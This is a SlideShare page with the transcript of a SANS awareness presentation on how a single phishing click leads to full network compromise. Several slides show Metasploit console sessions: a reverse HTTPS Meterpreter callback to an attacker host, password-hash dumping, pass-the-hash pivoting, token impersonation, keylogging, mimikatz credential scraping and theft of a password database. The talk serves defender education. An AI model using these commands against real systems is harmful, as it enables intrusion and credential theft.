Your SlideShare is downloading. ×
  • Like
  • Save
Why are our defenses failing us? One click is all it takes...
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×

Now you can save presentations on your phone or tablet

Available for both IPhone and Android

Text the download link to your phone

Standard text messaging rates apply

Why are our defenses failing us? One click is all it takes...

  • 6,635 views
Published

Organizations are spending unprecedented amounts of money in an attempt to defend their assets...yet all too often, one click is all it takes for it all to come toppling down around them. Every day we …

Organizations are spending unprecedented amounts of money in an attempt to defend their assets...yet all too often, one click is all it takes for it all to come toppling down around them. Every day we read in the news about national secrets, intellectual property, financial records & personal details being exfiltrated from the largest organizations on Earth. How is this being done? How are they bypassing our defenses (e.g. strong passwords, non-privileged accounts, anti-virus, firewalls/proxies, IDS/IPS, logging, etc.) And most importantly, what can we do about it? A keen understanding of the true risks we face in today's threatscape is paramount to our success...

This technical presentation will walk through an example spear-phishing campaign to demonstrate:
- How attackers perform recon on key individuals in target organizations (e.g. admins, executives, engineers, help desk personnel, etc.)
- How attackers craft and deliver payloads that bypass most detection mechanisms
- How attackers elevate privileges to super-user levels - even on fully patched systems
- How attackers bypass strong passwords, smart cards, multi-factor, bio-metrics and virtually all forms of strong authentication
- How attackers move throughout the environment in search of their "prize" with minimal footprint or artifacts
- How attackers exfiltrate secrets out of the organization undetected

Many organizations are busy being busy, managing all kinds of projects and initiatives. They have all the right products. They have more logs than they know what to do with. Yet the uncomfortable question persists, "is it working?" If one click by a user is all it takes, we need to re-evaluate...

Published in Technology , Art & Photos
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
6,635
On SlideShare
0
From Embeds
0
Number of Embeds
4

Actions

Shares
Downloads
0
Comments
0
Likes
4

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. The SANS Institute “Why Are Our Defenses Failing Us? One Click Is All It Takes…” Bryce Galbraith, Principal Instructor https://www.linkedin.com/in/bgalbraith bryce@layeredsec.com @BryceGalbraith (Twitter) BryceGalbraith (Google+) This presentation is available at: http://www.slideshare.net/brycegalbraith/ Bryce Galbraith ©2014, All Rights Reserved 1
  • 2. Who am I? • A professional (ethical) hacker • Contributing author of, Hacking Exposed • Co-author of Foundstone’s, Ultimate Hacking course series • The founder of Layered Security • Principal Instructor and course author with the SANS Institute • Frequent speaker, blogger, Tweeter… Bryce Galbraith ©2014, All Rights Reserved 2
  • 3. Great quote "The world isn't run by weapons anymore, or energy, or money. It's run by little ones and zeroes, little bits of data. It's all just electrons.” -- Cosmo from the movie, “Sneakers” Bryce Galbraith ©2014, All Rights Reserved 3
  • 4. Never Before • Never before has there been such frenzy over these ones and zeroes • Never before have the stakes been higher than they are today • Never before has there been more need for advanced defensive technologies and skilled defenders Bryce Galbraith ©2014, All Rights Reserved 4
  • 5. Front page moments • Everywhere you look… – Major organizations are being breached • Continuous stream of announcements • No one seems to be immune • Many don’t even realize they are compromised – Major consequences • National secrets, intellectual property, PII, lost revenue, expensive cleanups, embarrassment, shame and numerous other negative effects Bryce Galbraith ©2014, All Rights Reserved 5
  • 6. The Actors • There are many actors – Nation states – Organized crime – Hacktivists – Terrorists – Competitors – Cyber punks Bryce Galbraith ©2014, All Rights Reserved 6
  • 7. Bryce Galbraith ©2014, All Rights Reserved 7
  • 8. So what are we missing? • Why are they able to do this? – We’re spending more than ever – Security products have matured – Regulations and laws abound – Awareness is higher than ever – Many orgs have the right products – Most orgs are doing good things Bryce Galbraith ©2014, All Rights Reserved 8
  • 9. Attackers choose the path of least resistance… Bryce Galbraith ©2014, All Rights Reserved 9
  • 10. This is all too often our users Bryce Galbraith ©2014, All Rights Reserved 10 Over half of the users clicked “Yes” to this warning! Most malware doesn’t present a warning at all…
  • 11. For RSA it was this… Bryce Galbraith ©2014, All Rights Reserved 11
  • 12. But click on what, exactly? • There are so many delivery options… – Potentially any website link • Drive-by downloads, links in e-mails, hacked sites hosting malicious code, etc. – Potentially any e-mail attachment • Malicious code can be easily delivered via attachments • MS Office (DOC/PPT/XLS/etc.), Adobe PDF, ZIP/RAR files, etc. – CD-ROMs or USB sticks in parking lot • Recent US Department of Homeland Security study – 6o% of users brought them into work and the malware executed on their machines. It jumped to over 90% with an official label. • Man-in-the-middle attacks (powerful enabler) Bryce Galbraith ©2014, All Rights Reserved 12
  • 13. One click? Really? • Is this really all it takes to bring down an entire organization? – Is this fact or F.U.D.? – Read the news…spear phishing often at the root • What about all of our defenses? – Modern OSs, strong passwords, good patching, smart cards, bio-metrics, non-admin user privs, anti-virus, smarter firewalls and proxies, IDS/IPS, etc. – Assuming we actually do all of these, attackers are still winning…otherwise, it’s just easier. Bryce Galbraith ©2014, All Rights Reserved 13
  • 14. So, what happens when our users click the wrong thing? • Let’s take a look at how quickly the dominos fall right after someone does this… Bryce Galbraith ©2014, All Rights Reserved 14
  • 15. No APT required • The following real-world example – Uses the Metasploit Framework • Free, open source exploitation framework – No über nation state sponsored malware or 0-days required – We do this against our clients on a regular basis - with permission  Bryce Galbraith ©2014, All Rights Reserved 15
  • 16. Craft the payload • The Metasploit Framework provides – Numerous file types • raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, vba, vbs, loop-vbs, asp, war • Office .doc/.xls, Adobe PDFs, Setup.exe, etc. – Numerous encoders • Multiple iterations w/ difference encoders – Numerous payloads (stages) • Meterpreter, vncinject, basic shell, many more – Numerous stagers • reverse_https, reverse_tcp, PassiveX, and more • Can use IPv6 or tunnel inside DNS packets – Social Engineering Toolkit aids in delivery • https://www.trustedsec.com/ Bryce Galbraith ©2014, All Rights Reserved 16
  • 17. Command and Control (C2) • Most orgs do not inspect SSL/TLS • Malware can establish a reverse HTTPS (or DNS) connection msf exploit(handler) > exploit [*] Started reverse handler on trustme.example.com:443 [*] Starting the payload handler... [*] Sending stage (752128 bytes) to 203.0.113.42 [*] Meterpreter session 1 opened (trustme.example.com:443 -> 10.10.10.72:1146) Bryce Galbraith ©2014, All Rights Reserved 17 meterpreter > Fast flux DNS techniques make the attacker’s IP a moving target that can be changed arbitrarily. Metasploit’s Meterpreter module is an amazing memory resident agent with numerous capabilities…
  • 18. What about NAT, firewalls, proxies and IDS/IPS? • This uses a reverse connection from a workstation to a place on the Internet over HTTPS? Hmm… – Looks very normal (avoids blacklists) – Malware can even hi-jack authenticated IE sessions • They’ve been doing it for years (e.g. BHO, OLE) • Smart cards, one-time passwords, biometrics and authenticated proxies can all be bypassed – Most organizations miss this entirely Bryce Galbraith ©2014, All Rights Reserved 18
  • 19. What about anti-virus? • Unfortunately, attackers have mastered the art of AV evasion – This is not a slam against AV (really) – All defenses have weaknesses – AV vendors have an extremely difficult job and they fight the fight daily – However, AV tends to be reactionary – Attackers have entire evasion frameworks • https://www.veil-evasion.com/ Bryce Galbraith ©2014, All Rights Reserved 19
  • 20. What about non-Admin users? • Limiting local Admin rights is a great idea for many reasons • However, many organizations grant regular users local Admin rights on their workstations anyway – Layers 8 & 9 (politics and funding) to blame? • If we do, escalation is often not even necessary for the attacker to perform • For those that do restrict local admin rights, there are still many options for attackers Bryce Galbraith ©2014, All Rights Reserved 20
  • 21. Local Privilege Escalation • Some activities require elevated permission levels – Local privilege escalation exploits – Often not patched in a timely fashion – Lower priority patches meterpreter > run post/windows/escalate/exploit_of_the_month <snip> meterpreter > getuid Server username: NT AUTHORITYSYSTEM meterpreter > New exploits come out regularly and 0-days make this especially likely over time… Bryce Galbraith ©2014, All Rights Reserved 21
  • 22. In memory process migration • Client exploitation is notoriously unstable and often temporary • Attacker solution? Migrate to a more stable process…even AV itself meterpreter > run migrate –n lsass.exe [*] Current server process: VictimProcess.exe (732) [*] Migrating to lsass.exe... [*] Migrating into process ID 640 [*] New server process: lsass.exe (640) meterpreter > getpid Current pid: 640 meterpreter > Local Security Authority Subsystem is a particularly stable and powerful process to migrate to. It has access to numerous security and crypto related functions… Bryce Galbraith ©2014, All Rights Reserved 22
  • 23. Grab password hashes • Local Admin passwords are often re-used throughout organizations meterpreter > run post/windows/gather/hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY ec32582b07e1d725c13740421bda27fa... [*] Obtaining the user list and keys... [*] Decrypting user keys... [*] Dumping password hints... No users with password hints on this system [*] Dumping password hashes... The built-in Admin account always has a RID of 500, regardless of the username. Decoys are easily spotted. NothingToSeeHere:500:5de59993f0a692ecc385a2a45364135b:a2158ca073c138cdcc7dea0727f34908::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:4496f4261a9307fe24a9c5742f83c890:58342ef2f4a89d14b535a5fed898f383::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:1b944ffade0d3c4997fe550aeb67e4cf::: Administrator:1005:aad3b435b51404eeaad3b453b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Bryce Galbraith ©2014, All Rights Reserved 23
  • 24. Crack the passwords • Rainbow Tables make quick work of virtually all passwords less than 15 characters if in LM Hash form – https://www.objectif-securite.ch/ This administrator account hash cracked in mere seconds on this site that provides a large rainbow table set accessible via a simple web interface… Bryce Galbraith ©2014, All Rights Reserved 24
  • 25. What about strong passwords? • What if LM Hashes aren’t stored? • What if passwords are 15+ chars? • Cracking hashes isn’t even necessary once the attacker has them • They can simply pass-the-hash to the next host…yes, really – Common local admin password re-use makes this even more damaging Bryce Galbraith ©2014, All Rights Reserved 25
  • 26. Pivoting and pass-the-hash meterpreter > background [*] Backgrounding session 1... msf exploit(handler) > route add 10.10.10.73 255.255.255.255 1 [*] Route added msf exploit(handler) > use exploit/windows/smb/psexec msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp msf exploit(psexec) > set SMBUser NothingToSeeHere msf exploit(psexec) > set SMBPass 5de59993f0a692ecc385a2a45664135b: a2158ca073c183cdcc7dea0727f34908 msf exploit(psexec) > set RHOST 10.10.10.73 msf exploit(psexec) > set LHOST 10.10.10.72 msf exploit(psexec) > exploit [*] Connecting to the server... [*] Started bind handler [*] Authenticating to 10.10.10.73:445 as user ’NothingToSeeHere’ <snip> [*] Sending stage (752128 bytes) [*] Closing service handle... [*] Meterpreter session 2 opened (10.10.78.200-10.10.10.72:443 -> 10.10.10.73:1656) Bryce Galbraith ©2014, All Rights Reserved 26 meterpreter > The attacker is able to pivot through the existing https session with the first victim and passing the common Admin hash to the next victim without ever cracking it or knowing the password! 10.10.10.72 10.10.10.73
  • 27. So, let’s not use passwords! • If hashes can simply be passed, let’s use something better – Biometrics, tokens, smart cards, RFID/NFC in our hand (cringe), DNA? Bryce Galbraith ©2014, All Rights Reserved 27
  • 28. Sadly, it doesn’t matter… • The method of authentication is often irrelevant to attackers • They have discovered methods to attack us post-authentication • After all, it is the actual authenticated user that is doing the clicking – ugh • When they know more than we do, they win – no mercy Bryce Galbraith ©2014, All Rights Reserved 28
  • 29. Security Access Tokens (SATs) • The SAT is all that matters after authentication has been completed – It doesn’t matter how we authenticated – Our SAT is conveyed to the system where we are accessing resources • File servers, SharePoint, home drive server(s) • As well as our local workstations – May reside in memory for hours – Even after users logoff Bryce Galbraith ©2014, All Rights Reserved 29
  • 30. Token impersonation (1) • With access to LSASS an attacker can impersonate other user tokens without ever having to know a password or authenticate at all • They simply impersonate the token of an authenticated user • Domain Admins are prime targets • Hackers love single sign-on solutions Bryce Galbraith ©2014, All Rights Reserved 30
  • 31. Token impersonation (2) meterpreter > getuid Server username: NT AUTHORITYSYSTEM meterpreter > use incognito Loading extension incognito...success. meterpreter > list_tokens -u Delegation Tokens Available ======================================== CORPnickburns NT AUTHORITYLOCAL SERVICE NT AUTHORITYNETWORK SERVICE NT AUTHORITYSYSTEM meterpreter > impersonate_token CORPnickburns [+] Delegation token available [+] Successfully impersonated user CORPnickburns meterpreter > getuid Server username: CORPnickburns meterpreter > The attacker is able to impersonate another user’s security context by impersonating their SAT directly from the LSASS process in memory. The attacker is the other user as far as Windows is concerned. An attacker can pass-the-hash to move to a system with many tokens (e.g. Sharepoint, file servers, etc.) then impersonate a higher value token. Like a Domain Admin user token…without accessing their hash or knowing their password at all… Bryce Galbraith ©2014, All Rights Reserved 31
  • 32. Token impersonation (3) meterpreter > getuid Server username: CORPnickburns meterpreter > shell Process 1428 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. Bryce Galbraith ©2014, All Rights Reserved 32 C:>net view /domain net view /domain Domain ------------------------------------------------------------------------------- CORP The command completed successfully. C:> The attacker can now use built-in Windows functionality (command-line kung fu) to discover new hosts and choose the next target… With the impersonated Domain Admin token, the attacker has access to virtually all Windows resources.
  • 33. Token impersonation (4) C:>net view /domain:corp net view /domain:corp Server Name Remark ------------------------------------------------------------------------------- CORPDC Corporate domain controller FILESRV042 Employee file server SHAREPOINT023 Corp Sharepoint server WS-NBURNS Workstation The command completed successfully. C:>net use * corpdcc$ net use * corpdcc$ Drive Z: is now connected to corpdcc$. The command completed successfully. Bryce Galbraith ©2014, All Rights Reserved 33 C:>z: Z: The attacker is now able to map a drive to the AD domain controller without even providing a password. Single sign-on works for attackers too…
  • 34. Passwords are still the best • Despite these powerful techniques, attackers often prefer actual passwords if possible – Longer term access, easier movement, less limitations, may allow additional access • Password re-use/sync across other systems (e.g. VPN, non-windows systems) Bryce Galbraith ©2014, All Rights Reserved 34
  • 35. Key logging • Key logging can expose even the strongest of passwords meterpreter > run migrate -n explorer.exe [*] Current server process: lsass.exe (476) [+] Migrating to 3808 [+] Successfully migrated to process meterpreter > bgrun keylogrecorder –t 1 [*] Executed Meterpreter with Job ID 1 meterpreter > [*] Starting the keystroke sniffer... [*] Keystrokes being saved in to /root/.msf4/logs/scripts/keylogrecorder/10.10.10.100.txt [*] Recording meterpreter > These will surely be useful to the attacker. The attacker migrates into explorer.exe, The Desktop. This does NOT require Administrative privileges. # tail –f /root/.msf4/logs/scripts/keylogrecorder/10.10.10.100 .txt 0h,Urw3lc0me!$#^ <Return> 0p3n$3zm3IS@id! <Return> They will never guess this one1!@#$ <Return> Bryce Galbraith ©2014, All Rights Reserved 35
  • 36. RAM-scraping malware • Passwords can even be scraped directly from RAM (memory) meterpreter > load mimikatz Loading extension mimikatz...success. meterpreter > wdigest [+] Running as SYSTEM [*] Retrieving wdigest credentials wdigest credentials =================== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;996 Negotiate WORKGROUP WS-JSMITH$ 0;459879 NTLM CORP Jsmith I hope they won't guess this. Bryce Galbraith ©2014, All Rights Reserved 36 meterpreter > Metasploit’s mimikatz extracts sensitive information directly from memory.
  • 37. Additional capabilities • Once the attacker has this kind of access they can – Capture key strokes – Take screenshots – Manipulate your webcam – Record through your microphone – Virtually anything software can do… meterpreter > run Display all 225 possibilities? (y or n) So many possibilities with Meterpreter’s post-exploitation scripts. Bryce Galbraith ©2014, All Rights Reserved 37
  • 38. Desktop screen shots meterpreter > run screenspy [*] New session on 10.10.10.100:49417... [*] explorer.exe Process found, migrating into 2624 [*] Migration Successful!! [*] Opening Interactive view… Anything on the display is now at risk. The ”run screenspy” script gives a continuous stream of screenshots at attacker defined intervals - ouch Is that KeePass password manager?? Passwords are hard to manage. Password managers are great tools for this…and they are big targets. Bryce Galbraith ©2014, All Rights Reserved 38
  • 39. Expand influence (1) meterpreter > shell Process 1428 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) Microsoft Corporation. All rights reserved. C:>cd c:Doc*nickb*My* C:Documents and SettingsnickburnsMy Documents>dir kee* Volume in drive C has no label. Volume Serial Number is C4E8-4270 Directory of C:Documents and SettingsnickburnsMy Documents 06/22/2014 07:39 PM 3,388 Keepass Database.kdb 1 File(s) 3,388 bytes 4 Dir(s) 40,122,826,752 bytes free C:Documents and SettingsnickburnsMy Documents>exit All files are at risk on the target systems. Including our password managers. meterpreter > download C:Documents and SettingsnickburnsMy DocumentsKeepass Database.kdb root [*] downloaded : C:Documents and SettingsnickburnsMy DocumentsKeepass Database.kdb -> root/Keepass Database.kdb Bryce Galbraith ©2014, All Rights Reserved 39
  • 40. Expand influence (2) The key logger captured the password to the password manager earlier: They will never guess this one1!@#$ Lucky for the attacker, they don’t have to guess… Bryce Galbraith ©2014, All Rights Reserved 40
  • 41. Expand influence (3) Will likely expose non-Windows systems as well This one has a 32-character random password Bryce Galbraith ©2014, All Rights Reserved 41
  • 42. Expand influence (4) Bryce Galbraith ©2014, All Rights Reserved 42
  • 43. One click really is all it takes… • One click led to… – Malicious code execution – Bypassing of the anti-virus – Controlled via one outbound connection – Privilege escalation up to SYSTEM level – Significant expansion of influence • Pivoted, cracked/passed hashes, impersonated SATs, etc. – Unauthorized access and exfiltration of highly sensitive zeros and ones – Network traffic looks very normal… Bryce Galbraith ©2014, All Rights Reserved 43
  • 44. Third Party Notification • Many organizations find out about these breaches when someone else tells them about it – Hackers (e.g. PasteBin, Tango Down!) – Customer complaints – Law enforcement, regulators, etc. – National security agencies Bryce Galbraith ©2014, All Rights Reserved 44
  • 45. Technology can’t do it alone… Bryce Galbraith ©2014, All Rights Reserved 45
  • 46. People | Process | Technology • People – Skilled defenders who understand the adversarial techniques being used – Tools and support required to win • Process – Strong policies and procedures that tackle these threats head-on • Technology – Advanced defensive technologies and solutions that really work Bryce Galbraith ©2014, All Rights Reserved 46
  • 47. We can win… • Attackers are not ghosts, they are not magic • But we cannot expect to defend against threats we do not know about or understand • Awareness is crucial • There are defenses that work • We must educate ourselves and our staff • We must empower our people with knowledge, advanced tools and the support they need to be successful, or else… Bryce Galbraith ©2014, All Rights Reserved 47
  • 48. Who will the next “winner” be? http://pwnies.com/ Bryce Galbraith ©2014, All Rights Reserved 48
  • 49. The SANS Institute “Why Are Our Defenses Failing Us? One Click Is All It Takes…” Bryce Galbraith, Principal Instructor https://www.linkedin.com/in/bgalbraith bryce@layeredsec.com @BryceGalbraith (Twitter) BryceGalbraith (Google+) This presentation is available at: http://www.slideshare.net/brycegalbraith/ Bryce Galbraith ©2014, All Rights Reserved 49